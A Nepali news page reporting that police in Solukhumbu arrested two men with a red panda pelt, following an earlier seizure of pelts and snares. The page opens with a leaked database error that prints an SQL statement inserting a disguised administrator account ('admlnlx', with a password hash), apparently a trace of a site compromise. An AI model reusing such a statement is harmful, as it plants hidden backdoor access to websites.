WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFdlXLlWXvP2aP4G.Zvgdf/DUdP6WQ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 04:21:01', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । दुर्लभ वन्यजन्तु रेड पाण्डाको छालासहित दुई जना सोलुखुम्बु प्रहरीले पक्राउ गरेको छ । पक्राउ पर्नेमा माप्यदुधकोशी गाउँपालिका ६ का ३० बर्षिय राजेश मगर र ४६ बर्षिय भक्त बहादुर मगर रहेका छन् ।
उनीहरुलाई सोलुदुधकुण्ड नगरपालिका ५ बाट एक थान रेडपाण्डाको छाला सहित शुक्रबार साँझ पक्राउ गरेको जिल्ला प्रहरी कार्यालय सोलुखुम्बुका सुचना अधिकारी इन्सपेक्टर महेन्द्र दर्नालले जानकारी दिए ।
पक्राउ परेका दुबै जनालाई थप अनुसन्धानका लागी निकुञ्जको जिम्मा लगाईएको प्रहरीले जनाएको छ । गत आईतबार महाकुलुङबाट सात ओटा रेडपाण्डाको छाला र रेडपाण्डा मार्न प्रयोग गरिने पाँच ओटा पासो सहित तीन जनालाई प्रहरीले पक्राउ गरेको थियो ।
उनीहरुकै बयानको आधारमा राजेश र भक्त बहादुरलाई पक्राउ गरेको प्रहरी निरिक्षक दर्नालले जानकारी दिए ।